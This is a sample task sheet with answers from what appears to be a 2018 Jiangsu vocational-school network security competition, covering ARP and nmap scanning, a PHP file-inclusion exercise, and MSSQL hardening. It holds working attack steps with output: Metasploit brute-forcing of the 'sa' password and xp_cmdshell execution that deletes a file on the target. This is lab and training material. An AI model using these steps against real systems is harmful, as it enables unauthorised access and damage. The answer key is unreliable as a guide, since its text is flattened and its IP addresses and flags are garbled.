江苏2018年度中职组网络空间安全赛项样题及答案.doc

。2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书（样题）一、竞赛时间9:00-12:00，共计3小时。二、竞赛阶段简介竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务1ARP协议渗透测试9:00-11:0015任务2操作系统及应用程序扫描渗透测试15任务3Web应用程序文件包含安全攻防20任务4数据库安全加固20第二阶段分组对抗系统加固11:00-11:1530渗透测试11:15-12:00三、竞赛任务书内容（一）拓扑图（二）第一阶段任务书任务1.ARP扫描渗透测试任务环境说明： 服务器场景：CentOS5.5 服务器场景操作系统：CentOS5.51. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作使用命令中固定不变的字符串作为Flag提交；Arping c 5 x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具arping，发送请求数据包数量为5个），并将该操作结果的最后1行，从左边数第2个数字作为Flag提交；Arping c 5 x.x.x.xrootkali:# arping -c 5 22ARPING 22 from 00 eth0Unicast reply from 22 00:0C:29:62:80:73 1.017msUnicast reply from 22 00:0C:29:62:80:73 0.638msUnicast reply from 22 00:0C:29:62:80:73 1.051msUnicast reply from 22 00:0C:29:62:80:73 1.590msUnicast reply from 22 00:0C:29:62:80:73 1.051msSent 5 probes (1 broadcast(s)Received 5 response(s)Flag:53. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag（形式：字符串1/字符串2/字符串3/字符串n）提交； msf use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep 4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交；msf use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) run* 22 appears to be up (VMware, Inc.).* appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag:completed5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交；msf auxiliary(arp_sweep) run* 22 appears to be up (VMware, Inc.).* appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag:appears6. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交；Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明： 服务器场景：CentOS5.5 服务器场景操作系统：CentOS5.51. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap n Sp x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试（使用工具nmap），并将该操作显示结果的上数第3行左数第3个单词作为Flag提交；rootkali:# nmap -n -sP 22Starting Nmap 7.40 ( ) at 2017-12-10 19:59 ESTNmap scan report for 22Host is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 secondsFlag:up3. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；rootkali:# nmap -n -A 22Starting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report for 22Host is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 22OS and Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap n A x.x.x.x4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作显示结果的最后1行最后1个单词作为Flag提交；rootkali:# nmap -n -A 22Starting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report for 22Host is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 22OS and Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；rootkali:# nmap -O 22Starting Nmap 7.40 ( ) at 2017-12-10 20:13 ESTNmap scan report for 22Host is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopOS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.80 secondsFlag:Nmap O x.x.x.x6. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；Flag:Nmap sV x.x.x.x7. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作显示结果的SSH服务版本信息字符串作为Flag提交；rootkali:# nmap -sV 22Starting Nmap 7.40 ( ) at 2017-12-10 20:17 ESTNmap scan report for 22Host is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.60 secondsFlag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明： 服务器场景名称：WebServ2003 服务器场景安全操作系统：Microsoft Windows2003 Server 服务器场景安装中间件：Apache2.2； 服务器场景安装Web开发环境：Php6； 服务器场景安装数据库：Microsoft SqlServer2000； 服务器场景安装文本编辑器：EditPlus；1. 访问WebServ2003服务器场景，/-Display Uploadeds File Content，分析该页面源程序，找到提交的变量名，并将该变量名作为Flag（形式：name=“变量名”）提交；2. 对该任务题目1页面注入点进行渗透测试，通过php:/filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件：AppServ/Apache2.2/logs/flag.log的内容，并将注入语句作为Flag提交；3. 对该任务题目2页面注入点进行注入以后，将当前页面以Base64编码方式回显内容作为Flag提交；4. 通过PHP函数对题目3中Base64编码回显内容进行解码，并将解码内容作为Flag提交；5. 进入WebServ2003服务器场景的目录，找到DisplayFileCtrl.php文件，使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值，使之可以抵御文件包含渗透测试，并提交Flag（形式：F1|F2|F3|F4）；6. 再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效，并将回显页面源文件内容作为Flag提交；任务4.数据库安全加固任务环境说明： 服务器场景名称：WebServ2003 服务器场景安全操作系统：Microsoft Windows2003 Server 服务器场景安装中间件：Apache2.2； 服务器场景安装Web开发环境：Php6； 服务器场景安装数据库：Microsoft SqlServer2000； 服务器场景安装文本编辑器：EditPlus；1. 对服务器场景WebServ2003安装补丁，使其中的数据库Microsoft SqlServer2000能够支持远程连接，并将补丁包程序所在目录名称作为Flag提交；2. 对服务器场景WebServ2003安装补丁，使其中的数据库Microsoft SqlServer2000能够支持远程连接，在安装补丁后的服务器场景中运行netstatan命令，将回显的数据库服务连接状态作为Flag提交；C:Documents and SettingsAdministratornetstat -anActive Connections Proto Local Address Foreign Address State TCP :135 :0 LISTENING TCP :445 :0 LISTENING TCP :1025 :0 LISTENING TCP :1433 :0 LISTENING TCP 31:139 :0 LISTENING UDP :445 *:* UDP :500 *:* UDP :1434 *:* UDP :4500 *:* UDP :123 *:* UDP 31:123 *:* UDP 31:137 *:* UDP 31:138 *:*Flag:LISTENING3. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试，并将扫描结果作为Flag提交；msf use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) run* 31: - SQL Server information for 31:+ 31: - ServerName = SERVER+ 31: - InstanceName = MSSQLSERVER+ 31: - IsClustered = No+ 31: - Version = 8.00.194+ 31: - tcp = 1433+ 31: - np = SERVERpipesqlquery* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completed4. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果中的最后一个字符串作为Flag提交；msf use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) set username samsf auxiliary(mssql_login) set pass_file /usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) run* 31:1433 - 31:1433 - MSSQL - Starting authentication scanner.! 31:1433 - No active DB - Credential data will not be saved!- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%& (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%&* (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerbul (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerseun (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!gatvol (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!hotnot (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!kak (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!koedoe (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!likable (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!poes (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!pomp (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!soutpiel (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:.net (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:000000 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:00000000 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0007 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:007 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:007007 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0s (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0th (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:10 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:100 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1000 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1000s (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:100s (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1022 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:10s (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:10sne1 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1111 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:11111 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:111111 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:11111111 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:112233 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1212 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:121212 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1213 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1214 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1225 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:123 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:123123 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:123321 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:1234 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:12345 (Incorrect: )+ 31:1433 - 31:1433 - LOGIN SUCCESSFUL: WORKSTATIONsa:123456* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag: completed5. 通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用，删除WebServ2003服务器场景C:1.txt，并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag提交；msf auxiliary(mssql_login) use auxiliary/admin/mssql/mssql_execmsf auxiliary(mssql_exec) set rhost 31msf auxiliary(mssql_exec) set password 123456msf auxiliary(mssql_exec) set cmd cmd.exe /c del C:1.txtmsf auxiliary(mssql_exec) run* 31:1433 - SQL Query: EXEC master.xp_cmdshell cmd.exe /c del C:1.txt output - * Auxiliary module execution completedFlag: * 31:1433 - SQL Query: EXEC master.xp_cmdshell cmd.exe /c del C:1.txt6. 通过对服务器场景WebServ2003的数据库服务进行安全加固，阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试，并将加固身份验证选项中的最后一个字符串作为Flag提交：W7. 验证在WebServ2003的数据库服务进行安全加固后，再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解（使用PC2中的渗透测试平台中的字典文件superdic.txt），并将破解结果的从上向下数第3行内容作为Flag提交；msf auxiliary(mssql_login) run* 31:1433 - 31:1433 - MSSQL - Starting authentication scanner.! 31:1433 - No active DB - Credential data will not be saved!- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%& (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%&* (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerbul (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerseun (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!gatvol (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!hotnot (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!kak (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!koedoe (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!likable (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!poes (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!pomp (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!soutpiel (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:.net (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:000000 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:00000000 (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:0007 (Incorrect: